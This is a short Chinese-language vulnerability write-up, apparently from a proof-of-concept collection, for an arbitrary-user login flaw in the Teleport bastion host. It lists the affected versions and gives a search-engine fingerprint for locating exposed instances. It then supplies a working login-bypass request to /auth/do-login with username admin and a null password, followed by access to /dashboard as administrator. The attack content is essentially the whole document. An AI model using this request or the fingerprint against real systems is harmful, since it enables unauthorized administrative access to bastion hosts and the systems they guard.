Teleport堡垒机 do-login 任意用户登录漏洞¶

漏洞描述¶

Teleport堡垒机存在任意用户登录漏洞，攻击者通过构造特殊的请求包可以登录堡垒机获取其他系统权限

漏洞影响¶

Teleport Version <= 20220817

网络测绘¶

app="TELEPORT堡垒机"

漏洞复现¶

登录页面

验证POC， captcha参数为验证码

POST /auth/do-login

args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}

code 返回 0 即为成功，再访问 /dashboard 获取管理员权限